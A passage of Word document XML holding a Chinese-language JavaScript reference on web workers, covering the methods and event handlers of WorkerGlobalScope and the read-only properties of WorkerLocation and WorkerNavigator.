        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个自引用的属</w:t>
      </w:r>
      <w:r>
        <w:t>性指代当前</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>全局对象本身。它类似于主线程中</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了这儿列出的方法，</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>也定义了核心</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的所有全局函数，例如</w:t>
      </w:r>
      <w:r>
        <w:t>isNaN()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void clearInterval(long handle)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法和</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>中同名的方法一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void clearTimeout(long handle)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法和</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>中同名的方法一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void close()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法将当前</w:t>
      </w:r>
      <w:r>
        <w:t>wo</w:t>
      </w:r>
      <w:r>
        <w:t>rker</w:t>
      </w:r>
      <w:r>
        <w:t>置入一个特殊的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>关闭</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>状态。一旦进入这个状态，它将不会触发任何计时器或事件。脚本将继续执行，直到它返回</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>的事件循环，此时</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>将停止。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void importScripts(string urls...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于所有指定的</w:t>
      </w:r>
      <w:r>
        <w:t>urls</w:t>
      </w:r>
      <w:r>
        <w:t>，这个方法将相对于当前</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>地址解析它们，然后加载对应</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的内容，并将它们的内容当做</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码执行。注意这是一个同步方法。它按顺序加载并执行各个文件，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>并且在所有脚本执行完之前不会返回。（不过，如果任何脚本抛出了异常，这个异常将传播并且阻止</w:t>
      </w:r>
      <w:r>
        <w:t>后面的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的加载与执行。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void postMessage(any message,[MessagePort[]ports])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>发送一条</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>（以及一个可选的端口号组成的数组</w:t>
      </w:r>
      <w:r>
        <w:t>ports</w:t>
      </w:r>
      <w:r>
        <w:t>）给生成当前</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>的线程。调用这个方法将在父线程的</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发一个消息事件，关联的</w:t>
      </w:r>
      <w:r>
        <w:t>MessageEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>的一个副本。注意，在</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>是一个全局函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>long setInterval(any handler,[any timeou</w:t>
      </w:r>
      <w:r>
        <w:t>t],any args...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法和</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>中同名的方法一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>long setTimeout(any handler,[any timeout],any args...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法和</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>中同名的方法一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>包含核心</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的所有构造函数，如</w:t>
      </w:r>
      <w:r>
        <w:t>Array()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>。它也为诸如</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>FileReaderSync</w:t>
      </w:r>
      <w:r>
        <w:t>甚至</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象本身等定义了重要的客户端构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可通过设置这些全局事件处理程序属性来为</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>注册事件处理程序，也可以使用由</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>实现的</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这不是一个普通的事件处理程序：相对于</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它更像</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>属性。当</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>中发生了一个未处理的异常时，如果定义了这个处理函数，则它将被调用并传入三个字符串参数，分别定义错误消息、脚本</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>以及一个行号。如果这个函数返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，则将认为这个错误已经处理，并且不会继续传播。否则，如果没有设置这个属性，或错误处理程序没有返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，则错误将传播并将在父线程的</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发一个错误事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当父线程调用了代表当前</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Wor</w:t>
      </w:r>
      <w:r>
        <w:t>ker</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时，将在当前</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>上触发一个消息事件。一个</w:t>
      </w:r>
      <w:r>
        <w:t>MessageEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象将传入这个事件处理函数，这个对象的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性将保存父线程发送的</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>参数的一个副本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="887" w:name="WorkerLocation"/>
      <w:r>
        <w:t>WorkerLocation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="887"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>的主脚本的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>属性指代的</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerLocation</w:t>
      </w:r>
      <w:r>
        <w:t>对象类似</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>属性指代的</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象：它表示该</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>的主脚本的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，同时定义了一些代表</w:t>
      </w:r>
      <w:r>
        <w:t>了这个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的各个部分的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>的不同之处是它们不能导航或重新加载，所以对应</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerLocation</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性是只读的，这个对象也没有实现</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象的各个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>WorkerLocation</w:t>
      </w:r>
      <w:r>
        <w:t>对象不像一个通常的地址对象那样会自动转化为字符串。在</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>中，不能将</w:t>
      </w:r>
      <w:r>
        <w:t>location.href</w:t>
      </w:r>
      <w:r>
        <w:t>简写为</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些属性和</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象的同名属性含义相同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的片段标识符，包括开头的哈希标记。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonl</w:t>
      </w:r>
      <w:r>
        <w:t>y string host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的主机和端口部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly string hostname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的主机部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string href</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传入</w:t>
      </w:r>
      <w:r>
        <w:t>Worker()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数的完整的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>文本。这是</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>直接从它的父线程中接收的唯一值：其他值都间接地通过消息事件接收。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string pathname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的路径名部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的端口部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string protocol</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的协议</w:t>
      </w:r>
      <w:r>
        <w:t>部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string search</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的搜索或查询部分，包括开头的问号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="888" w:name="WorkerNavigator"/>
      <w:r>
        <w:t>WorkerNavigator</w:t>
      </w:r>
      <w:bookmarkEnd w:id="888"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>navigator</w:t>
      </w:r>
      <w:r>
        <w:t>属性指代一个</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerNavigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象，这个对象是</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象的一个简化版本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些属性和</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的同名属性含义相同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string appName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参见</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>appName</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">readonly string </w:t>
      </w:r>
      <w:r>
        <w:t>appVersion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参见</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>appVersion</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
